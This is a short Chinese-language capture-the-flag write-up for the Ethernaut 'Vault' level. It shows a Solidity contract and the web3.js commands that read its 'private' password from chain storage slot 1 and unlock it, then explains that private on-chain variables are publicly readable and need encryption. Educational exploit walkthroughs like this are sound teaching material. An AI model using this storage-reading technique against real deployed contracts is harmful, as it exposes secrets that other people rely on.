# Ethernaut CTF Level 8 - Vault ## 題目 ```solidity= // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; contract Vault { bool public locked; bytes32 private password; constructor(bytes32 _password) { locked = true; password = _password; } function unlock(bytes32 _password) public { if (password == _password) { locked = false; } } } ``` <br> ## 分析 所有資訊都是在鏈上，也包含Password 我們可以使用 `web3.js` 得到存在鏈上的資訊 <br> ## 攻擊 ```javascript web3.eth.getStorageAt(instance, 1).then(web3.utils.toAscii) "A very strong secret password :)" ```  <br> ```javascript= await contract.unlock("0x412076657279207374726f6e67207365637265742070617373776f7264203a29") // A very strong secret password :) await contract.locked() ``` <br> ## 補充 From Ethernaut 一定請記住！將一個變數設成私用變數(private variable)，只能保證這個變數不被其他合約存取。設成私用的(private)狀態變數和本地變數，還是可以被公開的存取(publicly access)。 為了確保資料的隱私，資料在上鏈前需要被加密。在這種情況下，密鑰絕對不可以被送到鏈上，不然隨便一個有心人都可以輕易取得密鑰，這樣你的資料隱私就會蕩然無存。zk-SNARKs 提供了一個可以驗證是否某使用者 A 有某一個秘密(secret)的方法，但是驗證的過程中又不需要揭露這個秘密。